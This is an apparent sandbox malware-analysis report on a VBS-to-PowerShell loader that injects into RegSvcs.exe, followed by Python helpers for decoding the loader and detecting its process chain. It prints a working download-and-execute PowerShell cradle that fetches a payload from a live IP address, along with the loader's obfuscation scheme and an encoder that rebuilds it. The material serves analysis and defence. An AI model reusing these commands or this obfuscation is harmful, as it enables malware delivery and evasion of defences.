            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match File source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 3.2.powershell.exe.18504e7a558.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000004.00000002.2957234369.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.1690160988.0000018504E7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 6884, type: MEMORYSTR
            Source: powershell.exe, 00000003.00000002.1690160988.0000018504E7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2957234369.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1989
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1125
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3572
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3801
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 6249
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 3601
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4284 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3300 Thread sleep count: 3572 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3300 Thread sleep count: 3801 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5552 Thread sleep time: -11068046444225724s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6576 Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1236 Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File Volume queried: C:\ FullSizeInformation
            Source: powershell.exe, 00000003.00000002.1690160988.0000018505FD7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmtoolsd
            Source: RegSvcs.exe, 00000004.00000002.2958104515.0000000001438000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
            Source: powershell.exe, 00000003.00000002.1707163230.000001851D005000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: Yara match File source: amsi64_4312.amsi.csv, type: OTHER
            Source: Yara match File source: Process Memory Space: powershell.exe PID: 3848, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTR
            Source: 3.2.powershell.exe.1851cfe0000.5.raw.unpack, MXuuJb.cs Reference to suspicious API methods: ReadProcessMemory_API(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesWritten)
            Source: 3.2.powershell.exe.1851cfe0000.5.raw.unpack, MXuuJb.cs Reference to suspicious API methods: VirtualAllocEx_API(processInformation.ProcessHandle, num4, length, 12288, 64)
            Source: 3.2.powershell.exe.1851cfe0000.5.raw.unpack, MXuuJb.cs Reference to suspicious API methods: WriteProcessMemory_API(processInformation.ProcessHandle, num5, data, bufferSize, ref bytesWritten)
            Source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, AntiProcess.cs Reference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
            Source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, Win32.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 40E000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 410000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: E88008
            Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
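The two PowerShell command lines above are the complete first and second stage. The first stage is not base64 as written: the loader replaced every 'A' in a base64 string with a space, so the blob only decodes after `.replace(' ','A')`, a UTF-16LE decode, and substitution of the `%pzAcOgInMr%` placeholder with the path of the .vbs. The second stage downloads base64 text from http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt, loads it as a .NET assembly in memory and calls `ClassLibrary1.Class1.ZxKHG`, passing a URL written backwards (`txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth`, which reverses to http://91.202.233.169/Tak/Reg/Marz/ENVS/DJ1.txt, the same string that turns up in the memory dumps further down). The Python below is an added triage helper, not code from the report or from the sample: it reproduces the loader's decoding step, re-encodes the report's second stage with the same scheme so the decoder can be exercised offline, and pulls both the plain and the reversed URLs out of a decoded script. Function names and the re-encoded sample are this example's own; the placeholder, path and URLs are taken from the command lines above. One caveat for anyone reaching for the blob as printed in this report: the HTML rendering has collapsed runs of consecutive spaces to single spaces (the `AA` sequences of the base64 became double spaces), so the printed text no longer decodes; take the string from the .vbs itself.

```python
import base64
import re

# Constructed sample input: the second-stage PowerShell from this report, with the
# '%pzAcOgInMr%' placeholder the first stage substitutes for the script path.
# It is re-encoded below with the loader's own scheme so decode_stage() can be run offline.
STAGE2_TEMPLATE = (
    "$qkvwr = '0';$iaquc = '%pzAcOgInMr%';"
    "[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient)"
    ".DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));"
    "[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1')"
    ".GetMethod('ZxKHG').Invoke($null, [object[]] "
    "('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));"
)
PLACEHOLDER = "%pzAcOgInMr%"
SCRIPT_PATH = r"C:\Users\user\Desktop\sostener.vbs"


def encode_like_loader(script: str) -> str:
    """Forward direction of the loader's obfuscation (added here for testing):
    UTF-16LE, base64, then every 'A' becomes a space so the blob no longer looks like base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii").replace("A", " ")


def decode_stage(blob: str, script_path: str = SCRIPT_PATH) -> str:
    """Undo the obfuscation exactly as the VBS-launched PowerShell does:
    spaces back to 'A', base64-decode, read as UTF-16LE, substitute the path placeholder.
    The blob must be the raw string from the script; consecutive spaces carry information."""
    b64 = blob.replace(" ", "A")
    return base64.b64decode(b64).decode("utf-16-le").replace(PLACEHOLDER, script_path)


_FORWARD_URL = re.compile(r"https?://[^\s'\"()]+")
_REVERSED_URL = re.compile(r"[^\s'\"()]+//:s?ptth")   # 'http://' spelled backwards


def extract_urls(script: str) -> list:
    """Collect plain URLs plus any written backwards (the '//:ptth' trick used for the
    second download), returned un-reversed and sorted."""
    found = set(_FORWARD_URL.findall(script))
    found.update(m[::-1] for m in _REVERSED_URL.findall(script))
    return sorted(found)


if __name__ == "__main__":
    blob = encode_like_loader(STAGE2_TEMPLATE)
    decoded = decode_stage(blob)
    print(decoded)
    for url in extract_urls(decoded):
        print("IOC:", url)
```

Running the decoder on a real sample produces the second stage verbatim, and `extract_urls` returns both download locations, so the reversed-string trick does not hide the second URL from indicator extraction.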
Source: RegSvcs.exe, 00000004.00000002.2959693552.00000000031E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2959693552.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2959693552.000000000320D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager@\^q
Source: RegSvcs.exe, 00000004.00000002.2959693552.00000000031E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2959693552.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2959693552.00000000031EB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: RegSvcs.exe, 00000004.00000002.2959693552.00000000031E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2959693552.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2959693552.000000000320D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager@\^q&
Source: RegSvcs.exe, 00000004.00000002.2959693552.00000000031E8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program ManagerTe^q|
Source: RegSvcs.exe, 00000004.00000002.2959693552.00000000031EB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager@\^qPaste_bin@\^q
Source: RegSvcs.exe, 00000004.00000002.2959693552.000000000320D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program ManagerTe^qL
Source: RegSvcs.exe, 00000004.00000002.2959693552.000000000320D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program ManagerTe^q,
Source: RegSvcs.exe, 00000004.00000002.2959693552.00000000031E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2959693552.00000000031DF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program ManagerTe^q
Source: RegSvcs.exe, 00000004.00000002.2959693552.00000000031EB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager`,^q
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
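The execution chain recorded above (wscript.exe starting powershell.exe, that PowerShell starting a second one, and the second one starting an argument-less RegSvcs.exe whose memory it then writes to) is what the Sigma hits in this report's signature list describe. As an added example, not part of the report and not the sandbox's own rules, the Python below turns those observations into process-creation checks and runs them over a handful of constructed events modelled on the command lines above. It assumes telemetry of the Sysmon Event ID 1 shape (pid, parent pid, image path, command line); the PIDs are invented, the base64 blob is shortened, the rule names are this example's own, and a benign PowerShell launch is included as a control.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed process-creation events modelled on the chain in this report
# (wscript -> powershell -> powershell -> RegSvcs). PIDs are invented, the base64
# blob is shortened, and pid 2000 is a benign control that must not fire.
EVENTS = [
    ProcEvent(1000, 900, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\sostener.vbs"'),
    ProcEvent(1001, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" $ExeNy = 'J Bx Gs dgB3 HI';"
              "$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( "
              "$ExeNy.replace(' ','A') ) );powershell $KByHL;"),
    ProcEvent(1002, 1001, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"[Byte[]] $ywjdh = "
              "[system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString("
              "'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain"
              ".Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] "
              "('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', '0', '1', 'Roda' ));\""),
    ProcEvent(1003, 1002, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'),
    ProcEvent(2000, 900, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process'),
]


def _base(image: str) -> str:
    return image.rsplit("\\", 1)[-1]


# .replace(' ','A') style: a single space mapped back onto one base64 alphabet character
_SPACE_TO_CHAR = re.compile(r"\.replace\(\s*'\s+'\s*,\s*'[A-Za-z0-9+/=]'\s*\)", re.I)


def rule_hits(ev: ProcEvent, parent: Optional[ProcEvent]) -> List[str]:
    """Names of the rules an event triggers; each mirrors one behaviour listed in the report."""
    cmd = ev.cmdline.lower()
    img = _base(ev.image).lower()
    pimg = _base(parent.image).lower() if parent else ""
    hits = []
    if img == "powershell.exe" and pimg in ("wscript.exe", "cscript.exe"):
        hits.append("wscript_spawns_powershell")        # script host acting as a dropper
    if "frombase64string" in cmd and _SPACE_TO_CHAR.search(ev.cmdline):
        hits.append("base64_with_char_substitution")    # blob only becomes base64 after .replace()
    if "//:ptth" in cmd:
        hits.append("reversed_url_literal")             # URL stored backwards to dodge string matching
    if "appdomain" in cmd and ".load(" in cmd:
        hits.append("inmemory_assembly_load")           # download-and-execute without touching disk
    if (img == "regsvcs.exe" and pimg == "powershell.exe"
            and cmd.strip().strip('"').endswith("regsvcs.exe")):
        hits.append("powershell_spawns_bare_regsvcs")   # empty .NET host process: injection target
    return hits


def evaluate(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Map pid -> triggered rule names, for events that trigger at least one rule."""
    by_pid = {e.pid: e for e in events}
    out: Dict[int, List[str]] = {}
    for e in events:
        hits = rule_hits(e, by_pid.get(e.ppid))
        if hits:
            out[e.pid] = hits
    return out


def lineage(events: List[ProcEvent], pid: int) -> List[str]:
    """Image basenames from the oldest known ancestor down to pid, for the alert context."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(_base(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


if __name__ == "__main__":
    for pid, hits in evaluate(EVENTS).items():
        print(pid, " -> ".join(lineage(EVENTS, pid)), hits)
```

Each rule on its own is noisy in a large estate (administrators do launch PowerShell from script hosts); the value is in the lineage: a RegSvcs.exe with no arguments whose ancestry is two PowerShell processes under wscript.exe has no legitimate reason to exist, and the memory writes into it recorded above are the injection that the bare-host rule is meant to anticipate.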

Lowering of HIPS / PFW / Operating System Security Settings

Source: Yara match | File source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.powershell.exe.18504e7a558.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.2957234369.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
